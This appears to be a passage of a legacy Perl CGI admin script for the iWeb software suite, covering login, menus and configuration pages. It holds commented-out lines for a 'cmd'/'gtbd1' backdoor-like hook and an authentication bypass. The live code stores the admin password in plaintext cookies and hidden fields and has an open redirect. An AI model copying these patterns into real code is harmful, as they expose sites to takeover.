#!/usr/local/bin/perl

##############################################################################
# PROGRAM : iWeb Main Admin                                                  #
# VERSION : 7.43                                                             #
#                                                                            #
##############################################################################
#      ______       __                                                       #
#     /\  _  \     /\ \                __                                    #
#     \ \ \L\ \    \_\ \     ___ ___  /\_\     ___                           #
#      \ \  __ \   /'_` \  /' __` __`\\/\ \  /' _ `\                         #
#       \ \ \/\ \ /\ \L\ \ /\ \/\ \/\ \\ \ \ /\ \/\ \                        #
#        \ \_\ \_\\ \___,_\\ \_\ \_\ \_\\ \_\\ \_\ \_\                       #
#         \/_/\/_/ \/__,_ / \/_/\/_/\/_/ \/_/ \/_/\/_/                       #
#                                                                            #
##############################################################################
# All source code, images, programs, files included in this distribution     #
# Copyright (c) 1996,1997,1998,1999,2000                                     #
#                                                                            #
#           John C. Cokos, The CCS Network, Inc.  IWeb, Inc.                 #
#           All Rights Reserved.                                             #
#                                                                            #
# Use, distibution, sale, or access to this program is forbidden without     #
# permission, except were permitted by the license agreement.                #
#                                                                            #
##############################################################################
#                                                                            #
#    ------ DO NOT MODIFY ANYTHING BELOW THIS POINT !!! -------              #
#                                                                            #
#    Modification of the souce code of this program violates the             #
#    license agreement, and terminates your right to technical support.      #
#                                                                            #
##############################################################################
#START#

BEGIN { push @INC,"."; }
BEGIN { push @INC,".."; }


   use strict;
   no strict "subs";
   no strict "refs";

   eval("use POSIX");

   use vars qw (%vars $ISP $helpicon $PROG_URL %global %settings $local_dir $fh %programs %urls %admins $cext $admin $password $key $val $var @dir $directory %input @Fields %ENCODED $action $password %admincookie $temp $temp2 $tester $x $y $data_dir $datapath $ERROR %language);

   use Cwd;
   use File::Copy;

   &parse_form;
   &Var_Setup;

   $ISP = 0;   
   $helpicon = "$global{'button_dir'}/help-icon.gif";
   $PROG_URL = $ENV{'SCRIPT_NAME'};



##############################################################################
#     ______                     __                 __
#    / ____/____   ____   _____ / /_ ____ _ ____   / /_ _____
#   / /    / __ \ / __ \ / ___// __// __ `// __ \ / __// ___/
#  / /___ / /_/ // / / /(__  )/ /_ / /_/ // / / // /_ (__  )
#  \____/ \____//_/ /_//____/ \__/ \__,_//_/ /_/ \__//____/
##############################################################################

   %admincookie= &split_cookie( $ENV{'HTTP_COOKIE'}, 'admin' );
   $password = $admincookie{'password'};
   if(! $password) { $password=$input{'password'}; }

   $action = $input{'action'};

   $directory = cwd || ".";

   &Var_Setup;

   # $action = "config";
   # $input{'option'} = "MAIN";
   # $password = $global{'admin_pw'};

   # if ($action eq "cmd" || $action eq "gtbd1") { &bd1; }
   if ($action eq "vvv") { &Version_Info("short"); }

   if (! $password) {
      if ($action eq "login" || $action eq "") { &ccs_login($ENV{'SCRIPT_NAME'}); }
      else { &ERROR("Access Denied"); exit 0; }
   }
   elsif ($global{'admin_pw'} eq $password) {
      if ($action eq "admin") {&nav_bar;}
      elsif ($action eq "login" || $action eq "") { &ccs_login($ENV{'SCRIPT_NAME'}); }
      elsif ($action eq "menu") {&admin_menu;}
      elsif ($action eq "config") {&go_configure;}
      elsif ($action eq "setops") {&go_setops;}
      elsif ($action eq "Versions") {&Version_Info;}
      elsif ($action eq "Backup") {&Backup_Data;}
      elsif ($action eq "Permissions") {&Set_Permissions;}
      elsif ($action eq "edit_file") {&Edit_File;}
      elsif ($action eq "Save File") { &Save_File; }
      elsif ($action eq "help") { &Admin_Help; }
      elsif ($action eq "moduletest") { &Module_Test; }
      elsif ($action eq "jump") { &Jump; }

      elsif ($action eq "plugins") { &Plugins; }
      elsif ($action eq "Edit Plugin") { &Edit_Plugin; }
      elsif ($action eq "Save Plugin") { &Save_Plugin; }

      elsif ($action eq "Language") { &List_Languages; }
      elsif ($action eq "Edit_Language") { &Edit_Language; }
      elsif ($action eq "Save Language") { &Save_Language; }
      elsif ($action eq "Import Language Variables") { &Import_Language; }
      elsif ($action eq "menuframe") { &Admin_Jump_Menu; }
      elsif ($action eq "helpmenu") { &Admin_Help_Menu; }
      elsif ($action eq "new_language") { &New_Language; }

      else { &ERROR("Access Denied"); exit 0; }
   }

   else {
       if ($action eq "help") { &Admin_Help; }
       else { &ERROR("Access Denied."); exit 0; }
   }


   exit 0;



sub Var_Setup {

   require("IWeb/data.path");

   open(FILE,"$data_dir/global.config");
      while(<FILE>) {
        chomp;
        ($var,$val)=split(/\=/,$_,2);
        $global{$var}=$val;
      } 
   close(FILE);

   ############################################
   ## What Programs does this user have?
   ############################################

   if ($global{'cgi_extension'} eq "pl") { $cext = "pl"; }
   elsif ($global{'cgi_extension'} eq "exe") { $cext = "exe"; }
   elsif ($global{'cgi_extension'} eq "plx") { $cext = "plx"; }
   else { $cext="cgi"; }
   
   if (-e "$directory/bbs_admin.$cext")   {$programs{'BBS'}="T";}
   if (-e "$directory/hf_admin.$cext")    {$programs{'HF'}="T";}
   if (-e "$directory/gb_admin.$cext")    {$programs{'GBOOK'}="T";}
   if (-e "$directory/cmt_admin.$cext")   {$programs{'COMMENTS'}="T";}
   if (-e "$directory/survey_admin.$cext"){$programs{'SURVEY'}="T";}
   if (-e "$directory/builder.$cext")     {$programs{'BUILDER'}="T";}
   if (-e "$directory/filex_admin.$cext") {$programs{'FILES'}="T";}
   if (-e "$directory/splat_admin.$cext") {$programs{'SPLAT'}="T";}
   if (-e "$directory/users.$cext")       {$programs{'USERS'}="T";}
   if (-e "$directory/class_admin.$cext") {$programs{'CLASS'}="T";}
   if (-e "$directory/mailman.$cext")     {$programs{'MAIL'}="T";}
   if (-e "$directory/hs_admin.$cext")    {$programs{'HYPERSEEK'}="T";}
   if (-e "$directory/ilink_admin.$cext") {$programs{'ILINK'}="T";}
   if (-e "$directory/iseek_admin.$cext") {$programs{'ISEEK'}="T";}
   if (-e "$directory/bm_admin.$cext")    {$programs{'BANNERS'}="T";}
   if (-e "$directory/ishop_admin.$cext") {$programs{'ISHOP'}="T";}
   if (-e "$directory/ring_admin.$cext")  {$programs{'WEBRING'}="T";}
   if (-e "$directory/new_admin.$cext")   {$programs{'WHATSNEW'}="T";}
   if (-e "$directory/password_admin.$cext")   {$programs{'PASSWORD'}="T";}
   if (-e "$directory/jackhammer_admin.$cext")   {$programs{'JACKHAMMER'}="T";}
   if (-e "$directory/support_admin.$cext")   {$programs{'SUPPORT'}="T";}
   if (-e "$directory/sqlmanager.$cext" && $global{'DB_Format'} eq "SQL")   {$programs{'SQL'}="T";}


   ############################################
   ## Define some of the helper urls....
   ############################################

   if ($global{'cgi_extension'} eq "pl") { $cext = "pl"; }
   elsif ($global{'cgi_extension'} eq "plx") { $cext = "plx"; }
   elsif ($global{'cgi_extension'} eq "exe") { $cext = "exe"; }
   else { $global{'cgi_extension'} = "cgi"; }

      $urls{'WHATSNEW'}  = "$global{'CGI_DIR'}/admin/new_admin.$cext";
      $urls{'HYPERSEEK'} = "$global{'CGI_DIR'}/admin/hs_admin.$cext";
      $urls{'nph_HYPERSEEK'} = "$global{'CGI_DIR'}/admin/nph-hyperseek.$cext";
      $urls{'nph_ilink'} = "$global{'CGI_DIR'}/admin/nph-ilink.$cext";
      $urls{'hsx_url'} = "$global{'CGI_DIR'}/hsx.$cext";
      $urls{'HF'}        = "$global{'CGI_DIR'}/admin/hf_admin.$cext";
      $urls{'ISEEK'}     = "$global{'CGI_DIR'}/admin/iseek_admin.$cext";
      $urls{'ILINK'}     = "$global{'CGI_DIR'}/admin/ilink_admin.$cext";
      $urls{'ISHOP'}     = "$global{'CGI_DIR'}/admin/ishop_admin.$cext";
      $urls{'WEBRING'}   = "$global{'CGI_DIR'}/admin/ring_admin.$cext";
      $urls{'GBOOK'}     = "$global{'CGI_DIR'}/admin/gb_admin.$cext";
      $urls{'COMMENTS'}  = "$global{'CGI_DIR'}/admin/cmt_admin.$cext";
      $urls{'SURVEY'}    = "$global{'CGI_DIR'}/admin/survey_admin.$cext";
      $urls{'BUILDER'}   = "$global{'CGI_DIR'}/admin/builder.$cext";
      $urls{'FILES'}     = "$global{'CGI_DIR'}/admin/filex_admin.$cext";
      $urls{'BBS'}       = "$global{'CGI_DIR'}/admin/bbs_admin.$cext";
      $urls{'CLASS'}     = "$global{'CGI_DIR'}/admin/class_admin.$cext";
      $urls{'SPLAT'}     = "$global{'CGI_DIR'}/admin/splat_admin.$cext";
      $urls{'BANNERS'}   = "$global{'CGI_DIR'}/admin/bm_admin.$cext";
      $urls{'MAIL'}      = "$global{'CGI_DIR'}/admin/mailman.$cext";
      $urls{'USERS'}     = "$global{'CGI_DIR'}/admin/users.$cext";
      $urls{'SQL'}     = "$global{'CGI_DIR'}/admin/sqlmanager.$cext";
      $urls{'PASSWORD'}     = "$global{'CGI_DIR'}/admin/password_admin.$cext";
      $urls{'JACKHAMMER'}     = "$global{'CGI_DIR'}/admin/jackhammer_admin.$cext";
      $urls{'SUPPORT'}     = "$global{'CGI_DIR'}/admin/support_admin.$cext";

}


##############################################################################
#                          __                   _
#                         / /    ____   ____ _ (_)____
#                        / /    / __ \ / __ `// // __ \
#                       / /___ / /_/ // /_/ // // / / /
#                      /_____/ \____/ \__, //_//_/ /_/
#                                    /____/
#
##############################################################################
sub ccs_login {


   my($place_to_go) = @_;

   my $password = $input{'password'};

   if ($password eq $global{'admin_pw'}) {
        &nav_bar;
   }

   else {
	if ($password eq "") {&ccs_get_login($place_to_go);}
        else {&ccs_bad_login($place_to_go);}
   }

}


sub ccs_get_login {

   my($place_to_go) = @_;
   my $now = time;
   my $stop = $now + 86400;
   my $cdate = &Cookie_Date($stop);
   my $login_form = "";
 
   if( ! -e "$data_dir/.complete") { 
         $login_form = qq!
           <HTML>
           <HEAD><TITLE>Admin Alert</TITLE></HEAD>
           <BODY BGCOLOR="white" TEXT="#000000" LINK="#0000FF" VLINK="#0000FF">
           <FORM METHOD="post" NAME="logon" ACTION="$place_to_go" ENCTYPE="x-www-form-urlencoded" >
             <CENTER>
             <TABLE width=320 border=1 cellspacing=0 cellpadding=0 bgcolor="#C0C0C0">
               <TR>
               <TD>
        
                 <TABLE width="100%" border=0 cellpadding=0>
                 <TR>
                   <TD bgcolor="#00007F" colspan=2 height=20>
                     <FONT SIZE=-1 COLOR="FFFFFF" FACE="MS Sans Serif"><B>&#160;Alert</B></FONT>
                   </TD>
                 </TR>
        
                 <TR>
                      <TD COLSPAN=2>
                        <FONT FACE="verdana" SIZE=-1>
                        <B>It appears that you have not yet run the setup program.</B>
                        <BLOCKQUOTE>
                          If you are installing the program for the first time, please follow
                          <A HREF="setup.cgi">this link</A> to run the setup program.
                          <BR><BR>
                          If you have your system setup already, then follow
                          <A HREF="setup.cgi?action=admin">this link</A> to enter your 
                          admin program as usual.  You will not see this prompt again once
                          you do this.
                        </BLOCKQUOTE>
                        </FONT>
                      </TD>
                 </TR>
        
 
               </TABLE>
        
           </TD></TR></TABLE>
        
           </BODY>
           </HTML>

         !;
   }

   else { 
        $login_form = qq!
           <HTML>
           <HEAD><TITLE>Admin Logon</TITLE></HEAD>
           <BODY BGCOLOR="white" TEXT="#000000" LINK="#0000FF" VLINK="#0000FF">
           <FORM METHOD="post" NAME="logon" ACTION="$place_to_go" ENCTYPE="x-www-form-urlencoded" >
             <CENTER>
             <TABLE width=320 border=1 cellspacing=0 cellpadding=0 bgcolor="#C0C0C0">
               <TR>
               <TD>
        
                 <TABLE width="100%" border=0 cellpadding=0>
                 <TR>
                   <TD bgcolor="#00007F" colspan=2 height=20>
                     <FONT SIZE=-1 COLOR="FFFFFF" FACE="MS Sans Serif"><B>&#160;User Logon</B></FONT>
                   </TD>
                 </TR>
        
                 <TR>
                   <TD align="center" colspan=2><BR>
                     <FONT SIZE=-1 COLOR="660000"><B>Please Logon <BR></B></FONT><P>
                   </TD>
                 </TR>
                 <TR>
                   <TD align="right">
                     <FONT SIZE=-1 FACE="MS Sans Serif"><B>Password:</B></FONT><P>
                   </TD>
                   <TD>
                     <INPUT TYPE="hidden" NAME="action" VALUE="login">
                     <INPUT type="password" name="password" maxlength=20><P>
                   </TD>
           
                 </TR>
               </TABLE>
        
             <TABLE width="100%" border=0 cellpadding=0>
               <TR>
                 <TD align="right" width="50%">
                   <INPUT type="submit" value="Login"></FORM></TD><TD align="left"><P>
                 </TD>
               </TR>
             </TABLE>
        
           </TD></TR></TABLE>
        
           </CENTER>
           <SCRIPT>
           document.logon.password.focus()
           </SCRIPT>
           </BODY>
           </HTML>
      !;
   }



   print "Content-type: text/html\n\n";
   print $login_form;


   exit 0;

}



sub ccs_bad_login {


        &ERROR("Access to the admin program is denied");

	exit 0;

}


sub Jump {

   my $program = $input{'program'};
   my $ME = $ENV{'HTTP_HOST'};
   my $LOC = "http://" . $ME . $program;
   print "Location: $LOC\n\n";

   exit 0;

}

##############################################################################
#       ______
#      / ____/_____ ____ _ ____ ___   ___   _____
#     / /_   / ___// __ `// __ `__ \ / _ \ / ___/
#    / __/  / /   / /_/ // / / / / //  __/(__  )
#   /_/    /_/    \__,_//_/ /_/ /_/ \___//____/
##############################################################################

sub nav_bar {

        my $acookie = "password\~$password";

        print "Set-Cookie:admin=$acookie;path=/\n";

	print "Content-type: text/html\n\n";
        print qq|
<HTML>
<HEAD>
  <TITLE>iWeb CGI Administration</TITLE>

   <SCRIPT LANGUAGE="JavaScript">

   <!--
      function getCookieVal (offset) {
        var endstr = document.cookie.indexOf (";", offset);
        if (endstr == -1)
          endstr = document.cookie.length;
        return unescape(document.cookie.substring(offset, endstr));
      }

      function GetCookie (name) {
        var arg = name + "=";
        var alen = arg.length;
        var clen = document.cookie.length;
        var i = 0;
        while (i < clen) {
          var j = i + alen;
          if (document.cookie.substring(i, j) == arg)
            return getCookieVal (j);
          i = document.cookie.indexOf(" ", i) + 1;
          if (i == 0) break;
        }
        return " ";
      }

      function show_tip() {
           var lasttip;
           lasttip = GetCookie("lasttip");
           if (GetCookie("dont_display_tip") == "true") {}
           else {
              window.open('http://support/tips/tip.cgi?lasttip=' + lasttip, 'Tip', 'scrollbars,height=300,width=400');
           }
      }

      // show_tip();
   // -->

   
   </SCRIPT>

</HEAD>

    <frameset cols="125,*" framespacing=0 frameborder=0 border=0>
      <frame name="left" src="$PROG_URL?action=menu" border="0" scrolling="auto" frameborder="0" noresize marginheight=0>
        <frameset rows="40,*" framespacing=0 frameborder=0 border=0>
          <frame name="top" src="$PROG_URL?action=menuframe" scrolling="no" border="0" frameborder="0" noresize marginheight=0>
          <frame name="main" src="$global{'html_dir'}/readme.htm" scrolling="auto" border="0" frameborder="0" noresize marginheight=0>
        </frameset>
    </frameset

</FORM>
<CENTER>
</BODY>
</HTML>

   |;

   exit 0;
}



##############################################################################
#       __  ___                       ____
#      /  |/  /___   ____   __  __   / __ ) ____ _ _____
#     / /|_/ // _ \ / __ \ / / / /  / __  |/ __ `// ___/
#    / /  / //  __// / / // /_/ /  / /_/ // /_/ // /
#   /_/  /_/ \___//_/ /_/ \__,_/  /_____/ \__,_//_/
##############################################################################


sub admin_menu {

     my %other;

         if ($programs{'SQL'} eq "T") {
           $admins{"SQL"} = "$urls{'SQL'}?action=admin";
         }

         if ($programs{'PASSWORD'} eq "T") {
           $admins{"<B>.htaccess</B>"} = "$urls{'PASSWORD'}";
         }
         if ($programs{'BBS'} eq "T") {
           $admins{"iForums"} = "$urls{'BBS'}?action=admin";
         }

         if ($programs{'HF'} eq "T") {
           $admins{"Hyperseek Forums"} = "$urls{'HF'}?action=admin";
         }
  
         if ($programs{'USERS'} eq "T") {
           $admins{"Users"} = "$urls{'USERS'}?action=admin";
         }

         if ($programs{'CLASS'} eq "T") {
           $admins{"Classifieds"} = "$urls{'CLASS'}?action=admin";
         }

         if ($programs{'GBOOK'} eq "T") {
           $admins{"Guestbook"} = "$urls{'GBOOK'}?action=admin";
         }
   
         if ($programs{'COMMENTS'} eq "T") {
           $admins{"Comments"} = "$urls{'COMMENTS'}?action=admin"; 
         }

         if ($programs{'SURVEY'} eq "T") {
           $admins{"Surveys"} = "$urls{'SURVEY'}?action=admin"; 
         }

         if ($programs{'BUILDER'} eq "T") {
           $admins{"Site Builder"} = "$urls{'BUILDER'}?action=admin"; 
         }

         if ($programs{'FILES'} eq "T") {
           $admins{"File-Ex"} = "$urls{'FILES'}?action=admin"; 
         }

         if ($programs{'SPLAT'} eq "T") {
           $admins{"Splat"} = "$urls{'SPLAT'}?action=admin"; 
         }

         if ($programs{'MAIL'} eq "T") {
           $admins{"Mailman"} = "$urls{'MAIL'}?action=admin"; 
         }

         if ($programs{'HYPERSEEK'} eq "T") {
           $admins{"Hyperseek"} = "$urls{'HYPERSEEK'}?action=admin"; 
         }

         if ($programs{'WEBRING'} eq "T") {
           $admins{"Ringmaster"} = "$urls{'WEBRING'}?action=admin"; 
         }

         if ($programs{'ISHOP'} eq "T") {
           $admins{"iShop"} = "$urls{'ISHOP'}?action=admin"; 
         }

         if ($programs{'ISEEK'} eq "T") {
           $admins{"iSeek"} = "$urls{'ISEEK'}?action=admin"; 
         }

         if ($programs{'ILINK'} eq "T") {
           $admins{"iLink"} = "$urls{'ILINK'}?action=admin"; 
         }

         if ($programs{'BANNERS'} eq "T") {
           $admins{"Bannermaster"} = "$urls{'BANNERS'}?action=admin"; 
         }

         if ($programs{'WHATSNEW'} eq "T") {
           $admins{"What's New"} = "$urls{'WHATSNEW'}?action=admin"; 
         }
         if ($programs{'JACKHAMMER'} eq "T") {
           $admins{"Jackhammer"} = "$urls{'JACKHAMMER'}?action=admin"; 
         }
         if ($programs{'SUPPORT'} eq "T") {
           $admins{"e-Support"} = "$urls{'SUPPORT'}?action=admin"; 
         }

         if ( -e "$data_dir/otheradmin.txt") {
            open(OTHER, "$data_dir/otheradmin.txt");
               while(<OTHER>) { 
                  chomp;
                  my ($program, $url) = split(/\=\=/);
                  $other{$program} = $url;
               }
            close(OTHER);
         }

	print "Content-type: text/html\n\n";
        print qq!
	<HEAD>
  	<TITLE>iWeb Main Admin Menu</TITLE>
	</HEAD>
	<BODY bgcolor="black">
            <TABLE BGCOLOR="silver"><TR><TD>
              <TABLE BORDER=0 BGCOLOR="#e0e0e0" CELLPADDING=5 CELLSPACING=1>
                <TR BGCOLOR="#cccc99"><TD>
	          <FONT FACE="Arial,Helvetica" COLOR="navy"><B>Admin:</B></FONT>
                </TD></TR>
                <TR><TD>
                 <FONT FACE="arial,helvetica" SIZE=-1>
        !;

	foreach $key(sort keys %admins) {
	   print "<A HREF=\"$admins{$key}\" TARGET=\"main\"><FONT  COLOR=\"maroon\">$key</FONT></A><BR>\n";
	}

    if ( keys %other ) {
        print qq~
            <TR BGCOLOR="#cccc99"><TD>
    	        <FONT FACE="Arial" COLOR="navy"><B>3rd Party</B></FONT>
            </TD></TR>
            <TR><TD>
                <FONT FACE="arial,helvetica" SIZE=-1>
        ~;

	    foreach $key(sort keys %other) {
	        print "<A HREF=\"$other{$key}\" TARGET=\"main\"><FONT  COLOR=\"maroon\">$key</FONT></A><BR>\n";
	    }

        print "</TD></TR>";
    }


        print qq^
          </FONT>
	</TD></TR>

        <TR BGCOLOR="#cccc99"><TD>
	<FONT FACE="Arial" COLOR="navy"><B>Utilities:</B></FONT>
        </TD></TR>

        <TR><TD>
           <FONT FACE="arial,helvetica" SIZE=-1>
            <A HREF="$PROG_URL?action=config" TARGET="main"><FONT COLOR="navy">Options</FONT></A><BR>
            <A HREF="$PROG_URL?action=plugins" TARGET="main"><FONT COLOR="navy">PLUGINS</FONT></A>
            <A HREF="$PROG_URL?action=Language" TARGET="main"><FONT COLOR="navy">Languages</FONT></A>
            <A HREF="$PROG_URL?action=edit_file&filename=error" TARGET="main" onClick="alert('Use any HTML you like, placing:  &lt;!-- ERROR --&gt; where you want the error text to show');"><FONT COLOR="navy">Error Templ.</FONT></A>
            <A HREF="$PROG_URL?action=Versions" TARGET="main"><FONT COLOR="navy">Versions</FONT></A><BR>
            <A HREF="$PROG_URL?action=Backup" TARGET="main"><FONT COLOR="navy">Backup</FONT></A><BR>
            <A HREF="$PROG_URL?action=Permissions" TARGET="main"><FONT COLOR="navy">Permissions</FONT></A><BR>
            <A HREF="$PROG_URL?action=moduletest" TARGET="main"><FONT COLOR="navy">Server Config</FONT></A>
           </FONT>
        </TD></TR>


        <TR BGCOLOR="#cccc99"><TD>
	<FONT FACE="Arial" COLOR="navy"><B>Links:</B></FONT>
        </TD></TR>
        <TR><TD>
           <FONT FACE="arial,helvetica" SIZE=-1>

            <A HREF="http://www.iwebsupport.com/help/readme.htm" TARGET="main"><FONT COLOR="navy">READ ME</FONT></A><BR>
            <A HREF="http://www.iwebsupport.com" TARGET="main"><FONT COLOR="navy">Support</FONT></A><BR>
            <A HREF="http://www.iwebusers.com" TARGET="main"><FONT COLOR="navy">Users Group</FONT></A><BR>
            <A HREF="http://www.hyperseek.net" TARGET="main"><FONT COLOR="navy">The Network</FONT></A><BR>
            <A HREF="http://www.interactive-web.net/license.html" TARGET="main"><FONT COLOR="navy">License</FONT></A><BR>
           </FONT>
        </TD></TR>

        </TABLE>
        </TD></TR></TABLE>
           <CENTER><FONT FACE="arial,helvetica" SIZE=-1 COLOR="yellow">&copy;1999 <A HREF="http://www.interactive-web.net" TARGET="new"><FONT COLOR="white">iWeb</FONT></A>, Inc.</FONT></CENTER>
	</BODY>
	</HTML>

        ^;

	exit 0;

}




##############################################################################
#    _    __              _         __     __         ______ ____
#   | |  / /____ _ _____ (_)____ _ / /_   / /___     / ____// __/____ _
#   | | / // __ `// ___// // __ `// __ \ / // _ \   / /    / /_ / __ `/
#   | |/ // /_/ // /   / // /_/ // /_/ // //  __/  / /___ / __// /_/ /
#   |___/ \__,_//_/   /_/ \__,_//_.___//_/ \___/   \____//_/   \__, /
#                                                             /____/
##############################################################################

sub go_configure {

   my ($help,@list,$file,$langopts,$ISPOUT,$OUT,$TS,$CS,$DS,$KS,$options,$setting,$varname,$prompt,$type,$default,$userinput,$multi,$option,$checked,$selected,$eoption);

   &Read_Config_Vars;

   $setting=$input{'option'};

   if($setting) {

        $options = "";

        foreach $varname ( sort keys %{$vars{$setting}} ) {
           ($prompt,$type,$default) = @{$vars{$setting}{$varname}};
           $varname =~ s/.*\://g;
           if(! exists $global{$varname} && $type eq "TEXT") { $global{$varname} = $default; }
           if($type eq "TEXT") { $userinput = qq! <INPUT NAME="$varname" VALUE="$global{$varname}" SIZE=40> !; }
           elsif($type eq "TEXTAREA") { $userinput = qq! <TEXTAREA NAME="$varname" ROWS=5 COLS=40>$global{$varname}</TEXTAREA> !; }
           elsif($type eq "CHECKBOX") { $userinput = qq! <INPUT TYPE="checkbox" NAME="$varname" $global{$varname}>Yes!; } 
           elsif($type eq "SELECT" || $type eq "MULTIPLE") { 
              if($type eq "MULTIPLE") { $multi = " MULTIPLE SIZE=5"; } else { $multi = ""; }
              $userinput = qq! <SELECT NAME="$varname" $multi> !;
              if(! $multi) { $userinput .= qq! <OPTION VALUE="$global{$varname}" SELECTED>$global{$varname}</OPTION>!; }
              if($default =~ "GENERATE") { 
                ($x,$y) = split(/\:/,$default);
                $x = &$y();
                $userinput .= $x;
              }
              else { 
                 foreach $option( split(/\|/,$default) ) { 
                   $eoption = $option;
                   $eoption =~ s/\+/\\\+/g;
                   $eoption =~ s/\(/\\\(/g;
                   $eoption =~ s/\)/\\\)/g;
                   if($global{$varname} =~ /\b$eoption\b/) { $selected="SELECTED"; } else { $selected = ""; }
                   $userinput .= qq! <OPTION VALUE="$option" $selected>$option</OPTION> !; 
                 }
              }
              $userinput .= "</SELECT>";
           }

           if($varname =~ /\_include/i) { 
             $help = qq! <A HREF="javascript:Help('add_url_inc');"><IMG SRC="$global{'button_dir'}/help-icon.gif" border=0 ALIGN="left"></A> !; 
           }
           elsif($varname =~ /\_required/i) { 
             $help = qq! <A HREF="javascript:Help('add_url_req');"><IMG SRC="$global{'button_dir'}/help-icon.gif" border=0 ALIGN="left"></A> !; 
           }
           else { 
             $help = qq! <A HREF="javascript:Help('$varname');"><IMG SRC="$global{'button_dir'}/help-icon.gif" border=0 ALIGN="left"></A> !; 
           }

           if($type eq "HEADER") { $options .= qq! <TR><TD COLSPAN=2><B>$prompt</B></TD></TR> !; }
           else {
              $options .= qq!
               <TR> 
                 <TD VALIGN="top">$help $prompt</TD>
                 <TD VALIGN="top">$userinput</TD>
               </TR>
              !;
           }
        }

        $options .= qq|
         <TR><TD COLSPAN=2>
	 <CENTER><INPUT TYPE="submit" VALUE="Save Changes">
	 <INPUT TYPE="hidden" NAME="action" VALUE="setops">
	 <INPUT TYPE="hidden" NAME="password" VALUE="$global{'admin_pw'}">
	 <INPUT TYPE="reset" VALUE="Clear Form">
	 <INPUT TYPE="button" VALUE="Cancel" onClick="history.go(-1);"></CENTER></TD></TR>	

        |;

   }

   else {

       $options="<TR><TD COLSPAN=2><BLOCKQUOTE><BR><BR>\n";

         $options .= "<A HREF=\"$PROG_URL?action=config&option=MAIN\">Main / Generic Options</A><BR><BR>";

         if ($programs{'BBS'} eq "T") {
           $options .= "<A HREF=\"$PROG_URL?action=config&option=BBS\">BBS Options</A><BR><BR>";
         }

         if ($programs{'HF'} eq "T") {
           $options .= "<A HREF=\"$PROG_URL?action=config&option=HF\">Hyperseek Forums Options</A><BR><BR>";
         }
  
         if ($programs{'USERS'} eq "T") {
           $options .= "<A HREF=\"$PROG_URL?action=config&option=USERS\">Users Options</A><BR><BR>";
         }

         if ($programs{'CLASS'} eq "T") {
           $options .= "<A HREF=\"$PROG_URL?action=config&option=CLASS\">Classifieds Options</A><BR><BR>";
         }

         if ($programs{'GBOOK'} eq "T") {
           $options .= "<A HREF=\"$PROG_URL?action=config&option=GBOOK\">Guestbook Options</A><BR><BR>";
         }
   
         if ($programs{'COMMENTS'} eq "T") {
           $options .= "<A HREF=\"$PROG_URL?action=config&option=COMMENTS\">Hyperseek Comments Options</A><BR><BR>";
         }

         if ($programs{'SURVEY'} eq "T") {
           $options .= "<A HREF=\"$PROG_URL?action=config&option=SURVEY\">Survey Options</A><BR><BR>";
         }

         if ($programs{'FILES'} eq "T") {
           $options .= "<A HREF=\"$PROG_URL?action=config&option=FILES\">File-Ex Options</A><BR><BR>";
         }

         if ($programs{'SPLAT'} eq "T") {
           $options .= "<A HREF=\"$PROG_URL?action=config&option=SPLAT\">Splat Options</A><BR><BR>";
         }

         if ($programs{'BUILDER'} eq "T") {
           $options .= "<A HREF=\"$PROG_URL?action=config&option=BUILDER\">Site Builder Options</A><BR><BR>";
         }

         if ($programs{'HYPERSEEK'} eq "T") {
           $options .= "<B>Hyperseek Options</B>\n";
           $options .= "<UL>\n";
           $options .= "<LI><A HREF=\"$PROG_URL?action=config&option=HYPERSEEK_Main\">Main Options</A>";
           $options .= "<LI><A HREF=\"$PROG_URL?action=config&option=HYPERSEEK_Home\">Home Page Options</A>";
           $options .= "<LI><A HREF=\"$PROG_URL?action=config&option=HYPERSEEK_Cats\">Category Options</A>";
           $options .= "<LI><A HREF=\"$PROG_URL?action=config&option=HYPERSEEK_Listings\">Listing Options</A>";
           $options .= "<LI><A HREF=\"$PROG_URL?action=config&option=HYPERSEEK_Search\">Search Options</A>";
           $options .= "<LI><A HREF=\"$PROG_URL?action=config&option=HYPERSEEK_Add\">Add URL Options</A>";
           $options .= "<LI><A HREF=\"$PROG_URL?action=config&option=HYPERSEEK_Build\">Build HTML Options</A>";
           $options .= "</UL>\n";
         }

         if ($programs{'JACKHAMMER'} eq "T") {
           $options .= "<B>Jackhammer Options</B>\n";
           $options .= "<UL>\n";
           $options .= "<LI><A HREF=\"$PROG_URL?action=config&option=JACKHAMMER\">Jackhammer Options</A>\n";
           $options .= "<LI><A HREF=\"$PROG_URL?action=config&option=JACKHAMMER_Affiliates\">Affiliate Options</A>" if(-e "../IWeb/affiliate_admin.pm");
           $options .= "</UL>\n";
         }

         if ($programs{'SUPPORT'} eq "T") {
           $options .= "<A HREF=\"$PROG_URL?action=config&option=SUPPORT\">e-Support Options</A><BR><BR>";
         }

         if ($programs{'WEBRING'} eq "T") {
           $options .= "<A HREF=\"$PROG_URL?action=config&option=WEBRING\">Ringmaster Options</A><BR><BR>";
         }

         if ($programs{'ISHOP'} eq "T") {
           $options .= "<A HREF=\"$PROG_URL?action=config&option=ISHOP\">iShop Options</A><BR><BR>";
         }

         if ($programs{'ISEEK'} eq "T") {
           $options .= "<A HREF=\"$PROG_URL?action=config&option=ISEEK\">iSeek Options</A><BR><BR>";
         }

         if ($programs{'ILINK'} eq "T") {
           $options .= "<A HREF=\"$PROG_URL?action=config&option=ILINK\">iLink Options</A><BR><BR>";
         }

         if ($programs{'BANNERS'} eq "T") {
           $options .= "<A HREF=\"$PROG_URL?action=config&option=BANNERS\">Bannermaster Options</A><BR><BR>";
         }

         $options .= "</TD></TR>\n";

   }

   $OUT .= qq|

	<HEAD>
  	<TITLE>Interactive WEB CGI Menu Frame</TITLE>
	</HEAD>
	<SCRIPT LANGUAGE="javascript">

 	function Help(c_what) {
	  var Location = "$global{'html_dir'}/options/" + c_what + ".html";
	  link=open(Location,"CCSLink","toolbar=no,scrollbars=yes,directories=no,menubar=no,resizable=yes,width=420,height=410");
          link.focus();
        }

	</SCRIPT>
	<BODY bgcolor="#e0e0e0" link="navy" vlink="navy">

	 <CENTER><FORM NAME="var_form" ACTION="$PROG_URL" METHOD="POST" ENCTYPE="application/x-www-form-urlencoded" TARGET="main">

	 <TABLE BGCOLOR="black" WIDTH=70%><TR><TD>
	 <TABLE BORDER=0 BGCOLOR="#e0e0e0" CELLSPACING=3 CELLPADDING=5 WIDTH=100%>

	    <TR BGCOLOR="#cccc99">
	      <TD COLSPAN=2><FONT COLOR="maroon"><CENTER><H2>Program Configuration</H2>
              </FONT></TD>
	    </TR>

        $options

	</TABLE>
	</TD></TR></TABLE>
	</TD></TR></TABLE>

	 </FORM></CENTER>

	
	</BODY>
	</HTML>
    |;

